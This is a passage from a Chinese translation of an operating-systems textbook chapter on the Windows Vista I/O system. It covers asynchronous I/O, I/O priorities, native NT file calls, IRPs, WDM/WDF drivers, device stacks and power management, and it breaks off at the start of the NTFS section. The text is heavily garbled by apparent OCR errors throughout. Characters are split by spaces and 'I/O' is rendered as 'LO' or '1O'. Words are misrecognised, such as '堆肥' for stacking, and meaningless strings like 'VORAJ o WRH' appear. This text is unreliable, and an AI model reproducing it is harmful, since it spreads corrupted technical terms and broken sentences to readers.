在 Windows 中 ， 所 有 与 硬件 无 关 的 程序 ， 如 文件 系统 、 反 病毒 过 滤器 、 卷 管理 器 、 网 络 协议 栈 ， 其 
至 内 核 服务 ， 都 是 用 LO 驱动 程序 来 实现 的 。 系 统 配置 必须 设置 成 能 够 加 载 这 些 驱动 程序 ， 因为 在 总 线 
上 不 存在 可 枚 举 相关 的 设备 。 其 他 如 文件 系统 ， 在 需要 时 由 特殊 代码 加 载 ， 例 如 文件 系统 识别 器 查看 宰 
卷 ， 以 及 辨别 文件 系统 格式 的 时 伐 。 

Windows 的 一 个 有 趣 的 特点 是 支持 动态 磁盘 (dynamic disk) 。 这 些 磁盘 可 以 跨越 多 个 分 区 ， 或 多 个 
磁盘 ， 甚 至 无 需 重新 启动 在 使 用 中 就 可 以 重新 配置 。 通 过 这 种 方式 ， 逻 辑 卷 不 再 被 限制 在 一 个 单一 的 分 
区 或 磁盘 内 ， 一 个 单一 的 文件 系统 也 可 以 透明 地 跨越 多 个 驱动 器 。 

从 LO 到 卷 可 被 一 个 特殊 的 Windows 驱 动 程序 过 滤 产生 考 表 影 副本 (Volume Shadow Copies), iti 
驱动 程序 创建 一 个 可 单独 挂 载 的， 并 代表 某 一 特定 时 间 点 的 卷 快照 。 为 此 ， 它 会 跟踪 快照 点 后 的 变化 。 
这 对 恢复 被 意外 删除 的 文件 或 根据 定期 生成 的 卷 快照 查看 文件 过 去 的 状态 非常 方便 。 

阴影 副本 对 精确 备份 服务 器 系统 也 很 有 价值 。 在 该 系统 上 运行 服务 器 应 用 程序 ， 它们 可 以 在 合适 的 
时 机 制作 一 个 干净 的 持久 备份 。 一 旦 所 有 的 应 用 程序 准备 就 结 ， 系 统 初始 化 卷 快照， 然后 通知 应 用 程序 
继续 执行 。 备 份 由 卷 快照 组 成 。 这 与 备份 期 间 不 得 不 脱 机 相 比 ， 应 用 程序 只 是 被 阻塞 了 很 短 的 时 间 。 

应 用 程序 参与 快照 过 程 ， 因 此 一 旦 发 生 故 障 ， 备 份 反映 的 是 一 个 非常 易于 恢复 的 状态 。 否 则 ， 就 算 
备份 仍然 有 用 ， 但 抓 取 的 状态 将 更 像 是 系统 崩溃 时 的 状态 。 而 从 崩溃 点 恢复 系统 更 加 困难 ， 其 至 是 不 可 
能 的 ， 因 为 崩溃 可 能 在 应 用 程序 执行 过 程 的 任意 时 刻 发 生 。 墨 非 定律 说 ， 故障 最 有 可 能 在 最 坏 的 时 候 发 
生 ， 也 就 是 说 ， 故 障 可 能 在 应 用 程序 的 数据 正 处 于 不 可 恢复 的 状态 时 发 生 。 

另 一 方面 ，Windows 支 持 异 步 ULO。 一 个 线程 启动 一 个 LO 操作 ， 然 后 与 该 1O 操 作 并行 执 行 。 这 项 功 
能 对 服务 器 来 说 特别 重要 。 有 各 种 不 同 的 方法 使 线程 可 以 发 现 该 UO 操 作 是 否 已 经 完成 。 一 是 启动 1/O 操 
作 的 同时 指定 一 个 事件 对 象 ， 然 后 等 待 它 结 束 。 另 一 种 方法 是 指定 一 个 队列 ， 当 IO 操作 完成 时 ， 系统 
将 一 个 完成 事件 插入 到 队列 中 。 三 是 提供 一 个 回调 函数 ，IO 操 作 完成 时 供 系统 调用 。 四 是 在 内 存 中 开 
辟 一 块 区 域 ， 当 IO 操作 完成 时 由 IO 管理 器 更 新 该 区 域 。 

我 们 要 讨论 的 最 后 一 个 方面 ， 是 由 Windows Vista 提 出 的 IO 优先 级 。 IO 优先 级 是 由 发 起 1O 操 作 的 
线程 来 确定 的 ， 或 者 也 可 以 明确 指定 。 共 有 5 个 优先 级 别 ， 分 别 是 : 关键 、 高 、 正 常 、 低 、 非常 低 。 关 
键 级 别 为 内 存 管理 器 预 留 ， 以 避免 系统 经 历 极端 内 存 压力 时 出 现 死 锁 现象 。 低 和 非常 低 的 优先 级 为 后 台 
进程 所 使 用 ， 例 如 磁盘 碎片 整理 服务 、 间 谍 软 件 扫描 器 和 桌面 搜索 ， 以 免 干 扰 正 常 操作 。 大 部 分 IO 操 
作 的 优先 级 是 正常 级 别 ， 但 是 为 避免 小 故障 ， 多 媒体 应 用 程序 也 可 标记 它们 的 IO 优先 级 为 高 。 多 媒体 
应 用 可 有 选择 地 使 用 带宽 预 留 模式 获得 带宽 保证 以 访问 时 间 敏 感 的 文件 ， 如 音乐 或 视频 。I/O 系 统 将 给 
应 用 程序 提供 最 优 的 传输 大 小 和 显 式 UVO 操 作 的 数目 ， 从 而 维持 应 用 程序 向 1/O 系 统 请 求 的 带宽 保证 。 


11.7.2 输入 /输出 API 调 用 
由 1/O 管 理 器 提供 的 API 与 大 多 数 操作 系统 提供 的 API 并 没有 很 大 的 不 同 。 基本 操作 有 open、read、 
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write、ioctl 和 close， 以 及 即 插 即 用 和 电源 操作 、 参 数 设置 、 刷 新 系统 缓冲 区 等 。 在 Win32 层 ， 这 些 API 被 包 
装 成 接口 ,向 特定 的 设备 提供 了 更 高 一 级 的 操作 。 在 底层 ， 这些 API 打 开设 备 ， 并 执行 这 些 基本 类 型 的 操作 。 
即使 是 对 一 些 元 数据 的 操作 ， 如 重 命名 文件 ， 也 没有 用 专门 的 系统 调用 来 实现 。 它 们 只 是 特殊 的 ioctl 操 作 。 
在 我 们 解释 了 IO 设备 栈 和 IO 管理 器 使 用 的 MO 请 求 包 (IRP) 之 后 ， 读 者 将 对 上 面 的 陈述 更 有 体会 。 


WO 系统 调用 ж ж 
NtCreateFile 打开 一 个 新 的 或 已 存在 的 文件 或 设备 
NtReadFile 从 一 个 文件 或 设备 上 读 取 数 据 
NtWriteFile 把 数据 写 到 一 个 文件 或 设备 
NtQueryDirectoryFile 请 求 关 于 一 个 目录 的 信息 ， 包 括 文件 
NtQueryVolumeinformationFile 请 求 关 于 一 个 卷 的 信息 
NtSetyolumeInformationFile 修改 卷 信息 
NtNotifyChangeDirectoryFile 当 任何 在 此 目录 中 或 其 子 目 录 树 中 的 文件 被 修改 时 执行 完成 
NtQueryInformationFile 请 求 关于 一 个 文件 的 信息 
NtSetInformationFile 修改 文件 信息 
NtLockFile 给 文件 中 一 个 区 域 加 镇 
NtUnlockFile 解除 区 域 镇 
NtFsControlFile 对 一 个 文件 进行 多 种 操作 
NtFlushBuffersFile 把 内 存 文件 缓冲 刷新 到 磁盘 
NtCancelloFile 取消 文件 上 未 完成 的 1/O 操 作 
NtDeviceloControlFile 对 一 个 设备 的 特殊 操作 


图 11-37 执行 WO 的 原生 NT АРІ 调用 


保持 了 Windows 一 货 的 通用 哲学 ， 原 生 NT 1/O 系 统 调用 带 有 很 多 参数 并 包括 很 多 变种 。 图 11-37 列 
出 了 1/O 管 理 器 中 主要 的 系统 调用 接口 。NtCreateFile 用 于 打开 已 经 存在 的 或 者 新 的 文件 。 它 为 新 创建 
的 文件 提供 了 安全 描述 符 和 一 个 对 被 请 求 的 访问 权限 的 详细 描述 ， 并 使 得 新 文件 的 创建 者 拥有 了 一 些 如 
何 分 配 磁盘 块 的 控制 权 。NtReadFile 和 NtWriteFile 需 要 文件 句柄 、 缓 冲 区 和 长 度 等 参数 。 它 们 也 需要 一 
个 明确 的 文件 偏 移 量 的 参数 ， 并 且 允 许 指 定 一 个 用 于 访问 文件 锁定 区 域 字 节 的 钥匙 。 正 如 上 面 提 到 的 ， 
大 部 分 的 参数 都 和 指定 哪 一 个 函数 来 报告 (很 可 能 是 异步 ) 1/O 操 作 的 完成 有 关 。 

NtQuerydirectoryFile 是 一 个 在 执行 过 程 中 访问 或 修改 指定 类 型 对 象 信息 的 标准 模式 的 一 个 例子 ， 
在 这 种 模式 中 存在 多 种 不 同 的 查询 API。 在 本 例 中 ， 指 定 类 型 的 对 象 是 指 与 某 些 目录 相关 的 一 些 文件 对 
象 。 一 个 参数 用 于 指定 请 求 什么 类 型 的 信息 ， 比 如 目录 中 的 文件 名 列表 ， 或 者 是 经 过 扩展 的 目录 列表 所 
需要 的 每 个 文件 的 详细 信息 。 由 于 它 实 际 上 是 一 个 LO 操作， 因此 它 支 持 所 有 的 报告 IO 操作 已 完成 的 标 
准 方法 。NtQueryVolumelnformationFile 很 像 是 目录 查询 操作 ， 但 是 与 目录 查询 操作 不 同 的 是 ， 它 有 一 
个 参数 是 打开 的 卷 的 文件 句柄 ， 不 管 这 个 卷 上 是 否 有 文件 系统 。 与 目录 不 同 的 是 ， 卷 上 有 一 些 参数 可 以 
修改 ， 因 此 这 里 有 了 单独 用 于 卷 的 API NtSetVolumelnformationFile, 

NtNotifyChangeDirectoryFile 是 一 个 有 趣 的 NT 范式 的 例子 。 线 程 可 以 通过 I/O 操 作 来 确定 对 象 是 否 
发 生 了 改变 (对 象 主要 是 文件 系统 的 目录 ， 就 像 在 此 例 中 ， 也 可 能 是 注册 表 键 )。 因 为 IO 操作 是 异步 的 ， 
所 以 线程 在 调用 1/O 操 作 后 会 立即 返回 并 继续 执行 ， 并 且 只 有 在 修改 对 象 之 后 线程 才 会 得 到 通知 。 未 处 
理 的 请 求 作为 一 个 外 部 的 IO 操作 ， 使 用 一 个 LO 请 求 包 (ТЕР) 被 加 入 到 文件 系统 的 队列 中 等 待 。 如 果 
想 从 系统 移 除 一 个 文件 系统 卷 ， 给 执行 过 未 处 理 IO 操作 的 线程 的 通知 就 会 出 问题 ， 因 为 那些 1O 操 作 正 
在 等 待 。 因 此 ，Windows 提 供 了 取消 未 处 理 I/O 操 作 的 功能 ， 其 中 包括 支持 文件 系统 强行 卸载 有 未 处 理 
VO 操作 的 卷 的 功能 。 

NtQueryInformationFile 是 一 个 用 于 查询 目录 中 指定 文件 的 信息 的 系统 调用 。 还 有 一 个 与 它 相 对 应 
的 系统 调用 ，NtSetinformationFile。 这 些 接口 用 于 访问 和 修改 文件 的 各 种 相关 信息 ， 如 文件 名 ， 类 似 
于 加 密 、 压 缩 、 稀 下 等 文件 特征 ， 其 他 文件 属性 和 详细 资料 ， 包 括 查 询 内 部 文件 ID 或 给 文件 分 配 一 个 唯 
一 的 二 进 制 名 称 (对 象 ID)。 
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这 些 系统 调用 本 质 上 是 特定 于 文件 的 ioctl 的 一 种 形式 。 这 组 操作 可 以 用 来 重 命名 或 删除 一 个 文件 。 
但 是 请 注意 ， 它 们 处 理 的 并 不 是 文件 名 ， 所 以 要 重 命名 或 删除 一 个 文件 之 前 必须 先 打 开 这 个 文件 。 它 们 
也 可 以 被 用 来 重新 命名 NTFS 上 的 交换 数据 流 ( 见 11.8 节 ) 。 

存在 独立 的 API (NtLockFile 和 NtUnlockFile) 用 来 设置 和 删除 文件 中 字 节 域 的 锁 。 通 过 使 用 共享 
模式 ，NtCreateFile 允 许 访问 被 限制 的 整个 文件 。 另 一 种 是 这 些 锁 API， 它 们 用 来 强制 访问 文件 中 受 限 
制 的 字 节 域 。 读 操作 和 写 操作 必须 提供 一 个 与 提供 给 NtLockFile 的 钥匙 相符 合 的 密 钥 ， 以 便 操 作 被 锁定 
的 区 域 。 

UNIX 中 也 有 类 似 的 功能 ， 但 在 UNIX 中 应 用 程序 可 以 自由 决定 是 否认 同 这 个 区 域 锁 。 
NtFsControlFile 和 前 面 提 到 的 查询 和 设置 操作 很 相像 但 它 是 一 个 旨 在 处 理 特定 文件 的 操作 ， 其 他 的 
API 并 不 适合 处 理 这 种 文件 。 例 如 ， 有 些 操作 只 针对 特定 的 文件 系统 。 

最 后 ， 还 有 一 些 其 他 的 系统 调用 ， 比 如 NtFlushBuffersFile。 像 UNIX 的 sync 系 统 调 用 一 样 ， 它 强 
制 把 文件 系统 数据 写 回 到 磁盘 。 NtCancelloFile 用 于 取消 对 一 个 特定 文件 的 外 部 1/0 请 求 ， 
NtDeviceloControlFile 实 现 了 对 设备 的 ioctl 操 作 。 它 的 操作 清单 实际 上 比 ioct 更 长 。 有 -一些 系统 调用 用 
于 按 文件 名 删除 文件 ， 并 查询 特定 文件 的 属性 但 这 些 操作 只 是 由 上 面 列 出 的 其 他 IO 管 理 器 操作 包 
装 而 成 的 。 在 这 里 ， 我 们 虽然 列 出 ， 但 并 不 是 真 的 要 把 它们 实现 成 独立 的 系统 调用 。 还 有 一 些 用 于 处 理 
VORAJ o WRH, Windows 的 队列 功能 帮助 多 线程 服务 器 提高 使 用 异步 UO 操 作 的 效率 ， 主 要 通 
过 按 需 准备 线程 并 降低 在 专用 线程 上 服务 LO 所 需要 的 上 下 文 切换 数目 来 实现 。 


11.7.3 W/O 实现 

Windows 1/O 系 统 由 即 揪 即 用 服务 、 电 源 管理 器 、1/O 管 理 器 和 设备 驱动 模型 组 成 。 即 插 即 用 服务 检 
测 硬 件 配 置 上 的 改变 并 且 为 每 个 设备 创建 或 拆 印 设备 栈 ， 也 会 引起 设备 驱动 程序 的 装载 和 印 载 。 功 耗 管 
理 器 会 调节 1/O 设 备 的 功 耗 状态 ， 以 在 设备 不 用 的 时 候 降低 系统 功 耗 。 IO 管理 器 为 管理 IO 内 核对 象 以 及 
如 loCallDrivers 和 loCompleteRequest 等 基于 IRP 的 操作 提供 支持 。 但 是 ， 支 持 Windows J/O 所 需要 的 大 
部 分 工作 都 由 设备 驱动 程序 本 身 实 现 。 

1. 设备 驱动 程序 

为 了 确保 设备 驱动 程序 能 和 Windows Vista 的 其 余部 分 协同 工作 ， 微 软 公 司 定义 了 设备 驱动 程序 需 
要 符合 的 WDM (Windows 驱 动 程序 模型 )。WDM 被 设计 成 能 在 Windows 98 系 统 上 运行 ， 也 能 在 从 
Windows 2000 开 始 的 基于 NT 的 系统 上 运行 。 WDM 允 许 开发 人 员 编写 与 两 类 系统 都 兼容 的 驱动 程序 。 微 
软 公司 还 提供 了 一 个 用 于 帮助 驱动 程序 开发 人 员 编 写 符合 模型 的 驱动 程序 的 开发 工具 箱 (Windows 驱动 
程序 开发 工具 箱 )。 大 部 分 Windows 驱 动 程序 的 开发 过 程 都 是 先 复制 一 份 合适 的 简单 的 驱动 程序 ， 然后 
修改 它 。 

微软 公司 也 提供 一 个 驱动 程序 验证 器 ， 用 以 验证 驱动 程序 的 多 个 行为 以 确保 驱动 程序 符合 Windows 
驱动 程序 模型 的 结构 要 求 和 IO 请 求 的 协议 要 求 、 内 存 管理 等 。 操作 系统 中 带 有 此 验证 器 ， 管 理 员 可 能 
通过 运行 verifier.exe 来 控制 驱动 程序 验证 器 ， 验证 器 允许 管理 员 配置 要 验证 哪些 驱动 程序 以 及 在 怎样 的 
范围 (多 少 资源 ) 内 验证 这 些 驱动 程序 。 

即使 有 所 有 的 驱动 程序 开发 和 验证 支持 ， 在 Windows 中 写 一 个 简单 的 驱动 程序 仍然 是 非常 困难 的 事 
情 ， 因 此 微软 建立 了 一 个 叫做 WDF (Windows 驱 动 程序 基础 ) 的 包装 系统 ， 它 运行 在 WDM 顶 层 ， 简 化 
了 很 多 更 普通 的 需求 ， 主要 和 驱动 程序 与 电源 管理 和 即 插 即 用 操作 之 间 的 正确 交互 有 关 。 

为 了 进一步 简化 编写 驱动 程序 ， 也 为 了 提高 了 系统 的 健壮 性 ，WDF 包 含 UMDF (用 户 模式 驱动 程 
序 架 构 )， 使 用 UMDF 编 写 的 驱动 程序 作为 在 进程 中 执行 的 服务 。 还 有 KMDF (内 核 模式 驱动 程序 架构 )， 
使 用 KMDF 编 写 的 驱动 程序 作为 在 内 核 中 执行 的 服务 ， 但 是 也 使 得 WDM 中 的 很 多 细节 变 得 不 可 预料 。 
由 于 底层 是 WDM， 并 且 WDM 提 供 了 驱动 程序 模型 ， 因 此 ， 本 节 将 主要 关注 WDM。 

在 Windows 中 ， 设 备 是 由 设备 对 象 描述 的 。 设 备 对 象 也 用 于 描述 硬件 (例如 总 线 )， 软 件 抽象 (И 
如 文件 系统 、 网 络 协议 ) ， 还 可 以 描述 内 核 扩展 (例如 病毒 过 滤器 驱动 程序 )。 上 面 提 到 的 这 些 设备 对 象 
都 是 由 Windows 中 的 设备 栈 来 组 织 的 ， 见 前 面 的 图 11-16。 

1O 操 作 从 1/O 管 理 器 调用 可 执行 APl loCallDriver 程 序 开始 ， loCallDriver 带 有 指向 顶层 设备 对 象 和 
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描述 I/O 请 求 的 IRP 的 指针 。 这 个 例 程 可 以 找到 与 设备 对 象 联合 在 一 起 的 驱动 程序 。 在 IRP 中 指定 操作 类 
型 通常 都 符合 前 面 讲 过 的 VO 管 理 器 系统 调用 ， 例 如 创建 、 读 取 和 关闭 。 

图 11-38 表 示 的 是 一 个 设备 栈 在 单独 一 层 上 的 关系 。 驱 动 程序 必须 为 每 个 操作 指定 一 个 进入 点 。 
loCallDriver 从 IRP 中 获取 操作 类 型 , 利用 在 当前 级 别 的 设备 栈 中 的 设备 对 象 来 查找 指定 的 驱动 程序 对 象 ， 
并 且 根据 操作 类 型 索引 到 驱动 程序 分 派 表 去 查找 相应 驱动 程序 的 进入 点 。 最 后 会 把 设备 对 象 和 IRP 传 递 
给 驱动 程序 并 调用 它 。 


设备 对 象 加 载 的 设备 驱动 程序 
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下 一 个 设备 对 象 


图 11-38 设备 栈 中 的 单独 一 层 

一 旦 驱动 程序 完成 处 理 IRP 描 述 的 请 求 后 ， 它 将 有 三 种 选择 。 第 一 ， 驱 动 程序 可 以 再 一 次 调用 
loCallDriver， 把 IRP 和 设备 栈 中 的 下 一 个 设备 对 象 传递 给 相应 的 驱动 程序 。 第 二 ， 驱动 程序 也 可 以 声明 
JI/O 请 求 已 经 完成 并 返回 到 调用 者 。 第 三 ， 驱 动 程序 还 可 以 在 内 部 对 IRP 排 队 并 返回 到 调用 者 ， 同时 声明 
VO 请 求 仍 未 处 理 。 后 一 种 情况 下 ， 如 果 栈 上 的 所 有 驱动 都 认可 挂 起 行为 且 返 回 各 自 的 调用 者 ， 则 会 引 
起 一 次 异步 1/O 操 作 。 

2.1/0 请 求 包 

图 11-39 表 示 的 是 IRP 中 的 主要 的 域 。IRP 的 底部 是 一 个 动态 大 小 的 数组 ， 包含 那些 被 设备 栈 管理 请 
求 的 域 ， 每 个 驱动 程序 都 可 以 使 用 这 些 域 。 在 完成 一 次 1/O 请 求 的 时 候 ， 这 些 设备 栈 的 域 也 允许 驱动 程 
序 指定 要 调用 哪个 例 程 。 在 完成 请 求 的 过 程 中 ， 按 倒序 访问 设备 栈 的 每 一 级 ， 并 且 依次 调用 由 每 个 应 用 
程序 指定 的 完成 例 程 。 在 每 一 级 ， 驱 动 程序 可 以 继续 执行 以 完成 请 求 ， 也 可 以 因为 还 有 更 多 的 工作 要 做 
从 而 决定 让 请 求 处 于 未 处 理 状态 并 且 暂 停 1O 的 完成 。 
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图 11-39 LO 请 求 包 的 主要 域 
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当 1O 管 理 器 分 配 一 个 IRP 时 ， 为 了 分 派 一 个 足够 大 的 IRP， 它 必须 知道 这 个 设备 栈 的 深度 。 在 建立 
设备 栈 的 时 候 ，IO 管 理 器 会 在 每 一 个 设备 对 象 的 域 中 记录 栈 的 深度 。 注 意 ， 在 任何 栈 中 都 没有 正式 地 
定义 下 一 个 设备 对 象 是 什么 。 这 个 信息 被 保存 在 栈 中 当前 驱动 程序 的 私有 数据 结构 中 。 事 实 上 这 个 栈 实 
际 上 并 不 一 定 是 一 个 真正 的 栈 。 在 每 一 层 栈 中 ， 驱 动 程序 都 可 以 自由 地 分 配 新 的 IRP， 或 者 继续 使 用 原 
来 的 RP， 或 者 发 送 一 个 1/O 操 作 给 另 一 个 设备 栈 ， 或 者 甚至 转换 到 一 个 系统 工作 线程 中 继续 执行 。 

IJRP 包 含 标志 位 、 索 引 到 驱动 程序 分 派 表 的 操作 码 、 指 向 内 核 与 用 户 缓冲 区 的 指针 和 一 个 MDL (内 
存 描 述 符 列表 ) 列表 。MDL 用 于 描述 由 缓冲 区 描述 的 物理 内 存 框 ， 也 就 是 用 于 DMA 操 作 。 有 一 些 域 用 
于 取消 和 完成 操作 。 当 IO 操作 已 经 完成 后 ， 在 处 理 IRP 时 用 于 排列 这 个 IRP 到 设备 中 的 域 会 被 重用 。 目 
的 是 给 用 于 在 原始 线程 的 上 下 文中 调用 1/0 管 理 器 的 完成 例 程 的 APC 控 制 对 象 提供 内 存 。 还 有 一 个 连接 
域 用 于 连接 所 有 的 外 部 IRP 到 初始 化 它们 的 线程 。 

3. 设备 栈 (Device Stack) 

Windows Vista 中 的 驱动 程序 可 以 自己 完成 所 有 的 任务 ， 如 图 11-40 所 示 的 打印 机 驱动 程序 。 另 一 方 
面 ， 驱 动 程序 也 可 以 堆 倒 起 来 ， 即 一 个 请 求 可 以 在 一 组 驱动 程序 之 间 传 递 ， 每 个 驱动 程序 完成 一 部 分 工 
作 。 图 11-40 也 给 出 了 两 个 堆 公 的 驱动 程序 。 


用 户 进程 


驱动 
堆 委 


图 11-40 Windows 允 许 驱动 程序 堆 又 起 来 操作 设备 。 这 种 堆 又 
是 通过 设备 对 象 (Device Object) 来 表示 的 


堆 登 驱动 程序 的 一 个 常见 用 途 是 将 总 线 管理 与 控制 设备 的 功能 性 工作 分 离 。 因 为 要 考虑 多 种 模式 和 总 线 
事务 ，PCI 总 线 上 的 总 线 管 理 相当 复杂 。 通 过 将 这 部 分 工作 与 特定 于 设备 的 部 分 分 离 ， 驱 动 程序 开发 人 员 就 可 
以 从 学 习 如 何 控制 总 线 中 解脱 出 来 了 。 他 们 只 要 在 驱动 栈 中 使 用 标准 总 线 驱动 程序 就 可 以 了 。 类 似 地 ，USB 和 
SCSI 驱 动 程序 都 有 一 个 特定 于 设备 的 部 分 和 一 个 通用 部 分 。Windows 为 其 中 的 通用 部 分 提供 了 公共 的 驱动 程序 。 

堆肥 设备 驱动 程序 的 另 一 个 用 途 是 将 过 滤器 坚 动 程序 (filter driver) 插入 到 驱动 栈 中 。 我 们 已 经 讨 
论 过 文件 系统 过 滤器 驱动 程序 的 使 用 了 ， 该 驱动 程序 插入 到 文件 系统 之 上 。 过 滤器 驱动 程序 也 用 于 管理 
物理 硬件 。 在 IRP 沿 着 设备 栈 (Device Stack) 向 下 传递 的 过 程 中 ， 以 及 在 完成 操作 (completion 
operation) 中 IRP 沿 着 设备 栈 中 各 个 设备 驱动 程序 指定 的 完成 例 程 (completion routine) 向 上 传递 的 过 
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程 中 ， 过 滤器 驱动 程序 会 对 所 要 进行 的 操作 进行 变换 。 例 如 ， 一 个 过 滤器 驱动 程序 能 够 在 将 数据 存放 到 
磁盘 上 时 对 数据 进行 压缩 ， 或 者 在 网 络 传输 前 对 数据 进行 加 密 。 将 过 滤器 放 在 这 里 意味 着 应 用 程序 和 真 
正 的 设备 驱动 程序 都 不 必 知 道 过 滤器 的 存在 ， 而 过 滤器 会 自动 对 进出 设备 的 数据 进行 处 理 。 

内 核 态 设备 驱动 程序 是 影响 Windows 的 可 靠 性 和 稳定 性 的 严重 问题 。Windows 中 大 多 数 内 核 崩溃 都 
是 由 设备 驱动 程序 出 错 造成 的 。 因 为 内 核 态 设备 驱动 程序 与 内 核 及 执行 层 使 用 相同 的 地 址 空间 ， 驱 动 程 
序 中 的 错误 可 能 破坏 内 核 数据 结构 ， 甚 至 更 精 。 其 中 的 有 些 错误 之 所 以 产生 ， 部 分 原因 是 为 Windows 编 
的 设备 驱动 程序 的 数量 极其 庞大 ， 部 分 原因 是 设备 驱动 程序 由 缺乏 经 验 的 开发 者 编写 。 当 然 ， 为 了 编 
了 一 个 正确 的 驱动 程序 而 涉及 的 大 量 设备 细节 也 是 造成 驱动 程序 错误 的 原因 。 

IO 模型 是 强大 而 且 灵 活 的 ， 但 是 几乎 所 有 的 LO 都 是 异步 的 ， 因 此 系统 中 会 大 量 存在 竞 态 条 件 
(гасе condition)。 从 Win9x 系 统 到 基于 NT 技术 的 Windows 系 统 ，Windows 2000 首 次 增加 了 即 插 即 用 (的 
功能 ) 和 电源 管理 设施 。 这 对 要 正确 地 操纵 在 处 理 UO 包 过 程 中 涉及 的 驱动 器 的 驱动 程序 提出 了 很 多 要 
求 。PC 机 用 户 常常 插 上 / 技 掉 设备 ， 把 笔记 本 电脑 合 上 盖子 装 入 公 文 包 ， 而 通常 不 考虑 设备 上 那个 小 绿 
灯 是 否 仍然 亮 着 (表示 设备 正在 与 系统 交互 )。 编 写 在 这 样 的 环境 下 能 够 正确 运行 的 设备 驱动 程序 是 非 
常 具有 挑战 性 的 ， 这 也 是 开发 WDF (Windows Driver Foundation) 以 简化 Windows 驱 动 模型 的 原因 。 

电源 管理 器 集中 管理 整个 系统 的 电源 使 用 。 早 期 的 电源 管理 包括 关闭 显示 器 和 停止 磁盘 旋转 以 降低 
电源 消耗 。 但 是 ， 我 们 需要 延长 笔记 本 电脑 在 电池 供电 情况 下 的 使 用 时 间 。 我 们 还 会 涉及 长 时 间 无 人 看 
管 运行 的 桌面 计算 机 的 电源 节约 ， 以 及 节省 为 现今 存在 的 巨大 的 服务 器 群 提供 能 源 的 昂贵 花费 ( 像 微软 、 
Google 这 样 的 公司 将 服务 器 群 建 在 水 电站 附近 以 降低 费用 ) 。 当 我 们 面临 以 上 问题 时 ， 情 况 迅 速 变 得 复 
杂 起 来 。 

更 新 一 些 的 电源 管理 设施 可 以 在 系统 没有 被 使 用 的 时 候 ， 通 过 切换 设备 到 后 备 状态 甚至 通过 使 用 软 
电源 开关 (soft power switch) 将 设备 完全 关闭 来 降低 部 件 功 耗 。 在 多 处 理 器 中 ， 可 以 通过 关闭 不 需要 
的 CPU 和 降低 正在 运行 的 CPU 的 频率 来 减少 功 耗 。 当 一 个 处 理 器 空闲 的 时 候 ， 由 于 除了 等 待 中 断 发 生 之 
外 ， 该 处 理 器 不 需要 做 任何 事情 ， 它 的 功 耗 也 相应 减少 了 。 

Windows 支 持 一 种 特殊 的 关机 模式 一 一 休 眼 ， 该 模式 将 物理 内 存 复制 到 磁盘 、 然 后 把 电力 消耗 降低 
到 很 低 的 水 平 (笔记 本 电脑 在 休眠 状态 下 可 以 运行 几 个 星期 )， 电 池 的 消耗 也 变 得 十 分 缓慢 。 因 为 所 有 
的 内 存 状态 都 被 写 人 磁盘 ， 我 们 甚至 可 以 在 笔记 本 电脑 休 眼 的 时 候 为 其 更 换 电 池 。 从 休 眼 状态 重新 启动 
时 ， 系 统 恢复 已 保存 的 内 存 状 态 并 重新 初始 化 设备 。 这 样 计算 机 就 恢复 到 休眠 之 前 的 状态 ， 而 不 需要 重 
新 登录 ， 也 不 必 重 新 启动 所 有 休眠 前 正在 运行 的 应 用 程序 和 服务 。 尽 管 Windows 设 法 优化 这 个 过 程 ( 包 
括 忽略 在 磁盘 中 已 备份 而 在 内 存 中 未 被 修改 的 页 面 及 压缩 其 他 内 存 页 面 以 减少 对 LO 操作 的 需求 )， 对 于 
一 个 有 几 个 GB 内 存 的 笔记 本 电脑 或 课 面 机 来 说 ， 仍 然 需要 花费 数秒 钟 的 时 间 来 进入 休眠 状态 。 

另 一 种 可 选择 的 模式 是 待机 模式 ， 电 源 管理 器 将 整个 系统 降 到 最 低 的 功率 状态 ， 仅 使 用 足够 RAM 
刷新 的 功率 。 因 为 不 需要 将 内 存 复制 到 磁盘 ， 进 入 待机 状态 比 进入 休眠 状态 的 速度 更 快 。 但 是 待机 状态 
不 像 休眠 状态 那么 可 靠 。 因 为 如 果 在 待机 状态 遇 到 课 面 机 掉 电 ， 笔 记 本 电脑 更 换 电池 ， 或 者 由 于 驱动 程 
序 故障 使 得 设备 切换 到 低 功 耗 状态 后 无 法 重新 初始 化 等 情况 ， 系 统 将 无 法 恢复 到 待机 前 的 状态 。 在 开发 
Windows Vista 的 过 程 中 ， 微 软 和 很 多 硬件 设备 厂商 合作 ， 花 费 了 极 大 的 努力 改进 待机 模式 的 操作 。 他 们 
也 终止 了 允许 应 用 软件 禁止 系统 进入 待机 模式 这 一 习惯 (有 时 疏忽 的 用 户 没有 等 到 指示 灯 炮 灭 就 把 笔记 
本 电脑 放 进 公文 包 ， 从 而 导致 笔记 本 电脑 过 热 )。 

有 很 多 关于 WDM (Windows Driver Model) 和 WDF (Windows Driver Foundation) 的 有 用 的 书 
(Сат, 2005; Oney, 2002; Orwick & Smith, 2007 ; Viscarola 等 人 ，2007)。 


11.8 Windows NT 文件 系统 

Windows Vista 支 持 若干 种 文件 系统 ， 其 中 最 重要 的 是 FAT-16、FAT-32 和 NTFS (NT 文件 系统 )。 
FAT-16 是 MS-DOS 文 件 系统 ， 它 使 用 16 位 磁盘 地 址 ， 这 就 限制 了 它 使 用 的 磁盘 分 区 不 能 大 于 2GB。 现在 ， 
这 种 文件 系统 基本 上 仅 用 来 访问 软盘 。FAT-32 使 用 32 位 磁盘 地 址 ， 最 大 支持 2TB 的 磁盘 分 区 。FAT32 没 
有 任何 安全 措施 ， 现 在 我 们 只 在 可 移动 介质 〈 如 闪存 ) 中 使 用 它 。NTFS 是 一 个 专门 为 Windows NT 开发 
的 文件 系统 。 从 Windows XP 开始 ， 计 算 机 厂商 把 它 作为 默认 安装 的 文件 系统 ， 这 极 大 地 提升 了 
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Windows 的 安全 性 和 功能 。NTFS 使 用 64 位 磁盘 地 址 并 且 (理论 上 ) 能 够 支持 最 大 2” 字 节 的 磁盘 分 区 ， 
尽管 还 有 其 他 因素 会 限制 磁盘 分 区 大 小 。 

因为 NTFS 文 件 系统 是 一 个 带 有 很 多 有 趣 的 特性 和 创新 设计 的 现代 文件 系统 ， 在 本 章 中 我 们 将 针对 
NTFS 文 件 系统 进行 讨论 。NTFS 是 一 个 大 而 且 复杂 的 文件 系统 ;由 于 篇 幅 所 限 ， 我 们 不 能 讨论 其 所 有 的 
特性 ， 但 是 接 下 来 的 内 容 会 使 读者 对 它 印 象 深刻 。 


11.8.1 基本 概念 

NTFS 限 制 每 个 独立 的 文件 名 最 多 由 255 个 字符 组 成 ， 全 路 径 名 最 多 有 32 767 个 字符 。 文 件 名 采用 
